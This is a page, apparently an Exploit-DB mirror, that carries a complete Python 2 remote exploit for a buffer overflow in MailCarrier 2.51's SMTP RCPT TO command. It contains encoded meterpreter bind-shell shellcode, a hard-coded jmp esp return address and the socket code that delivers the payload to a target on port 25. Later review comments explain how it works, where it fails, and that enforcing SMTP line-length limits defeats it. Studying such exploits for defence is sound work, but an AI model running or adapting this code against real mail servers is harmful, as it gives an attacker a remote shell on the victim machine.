MailCarrier 2.51 – ‘RCPT TO’ Buffer Overflow

  • 作者: Dino Covotsos
    日期: 2019-04-15
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/46695/
  • #!/usr/bin/python
    # Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
    # Date: 12/04/2019
    # Exploit Author: Dino Covotsos - Telspace Systems
    # Vendor Homepage: https://www.tabslab.com/
    # Version: 2.51
    # Software Link: N.A
    # Contact: services[@]telspace.co.za
    # Twitter: @telspacesystems (Greets to the Telspace Crew)
    # Tested on: Windows XP Prof SP3 ENG x86
    # CVE: TBC from Mitre
    # Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
    #0x7e4456f7 : jmp esp |{PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
    #POC
    #1.) Change ip and port in code
    #2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
    import sys
    import socket
    import time
    
    #msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
    # NOTE(review): payload is a bind_tcp meterpreter stager listening on 443 on
    # the target (header comment), run through the x86/alpha_mixed encoder with
    # the bytes listed above excluded; presumably those are bytes the SMTP parser
    # mangles, but that is not verified here. Because the output is mostly
    # printable, the bytes below are not a reliable signature on their own.
    shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
    "\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
    "\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
    "\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
    "\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
    "\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
    "\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
    "\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
    "\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
    "\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
    "\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
    "\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
    "\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
    "\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
    "\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
    "\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
    "\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
    "\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
    "\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
    "\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
    "\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
    "\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
    "\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
    "\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
    "\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
    "\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
    "\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
    "\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
    "\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
    "\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
    "\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
    "\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
    "\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
    "\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
    "\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
    "\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
    "\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
    "\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
    "\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
    "\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
    "\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
    "\x6f\x58\x55\x41\x41")
    
    # Buffer layout: 5090 bytes of filler up to the overwritten EIP slot (header:
    # "Vanilla EIP Overwrite"), then 0x7e4456f7 (the USER32.dll `jmp esp` from the
    # header comment) written little-endian, a 20-byte 0x90 NOP sled, the encoded
    # payload, and 100 bytes of trailing padding.
    # NOTE(review): the return address comes from a non-ASLR, non-rebased
    # USER32.dll of XP SP3 build 5.1.2600.5512 (header comment), so this only
    # works against that exact library build; anywhere the module is rebased the
    # jump lands elsewhere and the most likely outcome is a service crash
    # (denial of service) rather than code execution. SafeSEH is irrelevant here
    # because no SEH record is overwritten.
    buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100
    
    # Python 2 only: print statements and str-typed socket payloads; this file
    # does not parse under Python 3.
    print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Target address and port are hard-coded (header step 1). socket.connect()
    # returns None, so `connect` is always None and is never read afterwards.
    connect=s.connect(("192.168.0.150", 25))
    # Every server reply below is printed but never checked, so the SMTP dialogue
    # proceeds regardless of the response codes; there is also no error handling,
    # so a closed or reset connection raises socket.error out of the script.
    print s.recv(1024)
    s.send('EHLO root@telspace.co.za \r\n')
    print s.recv(1024)
    s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
    print s.recv(1024)
    # The overflow is delivered as the RCPT TO argument: several kilobytes on a
    # single SMTP command line (the script prints the exact length), far beyond
    # the 256-octet forward-path limit RFC 5321 allows. Defensive angle: an MTA,
    # SMTP proxy or gateway that enforces command-line/path length limits rejects
    # this before the vulnerable parser sees it, and an oversized RCPT TO
    # argument in SMTP logs is a simple, low-false-positive indicator.
    s.send('RCPT TO: '+ buffer + '\r\n')
    print s.recv(1024)
    s.send('QUIT\r\n')
    s.close()
    time.sleep(1)
    # The author treats reaching this line as failure (see the message); whether
    # a successful overflow ends in a blocked recv(), an empty reply or an
    # exception first is not verifiable from here.
    print "[*] Done, but if you get here the exploit failed!"